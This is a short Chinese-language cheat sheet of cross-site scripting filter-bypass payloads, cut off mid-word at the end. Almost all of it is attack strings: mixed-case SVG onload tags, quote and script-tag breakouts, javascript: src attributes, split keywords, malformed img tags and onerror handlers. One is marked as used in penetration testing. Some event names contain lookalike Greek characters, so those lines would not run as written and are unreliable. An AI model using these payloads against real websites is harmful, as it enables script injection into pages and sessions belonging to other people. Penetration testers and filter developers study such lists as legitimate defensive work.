1、SVG标签之大小写、“和</script>进行闭合标签、<!--注释,进行防御的绕过:
<sVg/OnLOaD=prompt(9)>
"><sVg/OnLOaD=prompt(9)>
</script><sVg/OnLOaD=prompt(9)>
"><svg/οnlοad=alert(/xssposed/)><!--
2、利用HTML标签属性值执行XSS
- 很多HTML标记中的属性都支持javascript:[code]伪协议的形式:
<img src = "javascript:alert(‘xss‘);">
- 过滤了javascript等敏感字符串:
< IMG SRC="jav ascript:alert('XSS');" >;
- 畸形的img标签:
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
3、特殊src属性的img标签
- 触发onerror事件:
<IMG SRC=0 οnerrοr=alert(document.domain)></img> --渗透测试用过的攻击向量
<IMG SRC=/ οnerrοr=alert(String.fromCharCode(88,83,83))></img>
- 使用默认为空的SRC属性:
<IMG SRC= οnmοu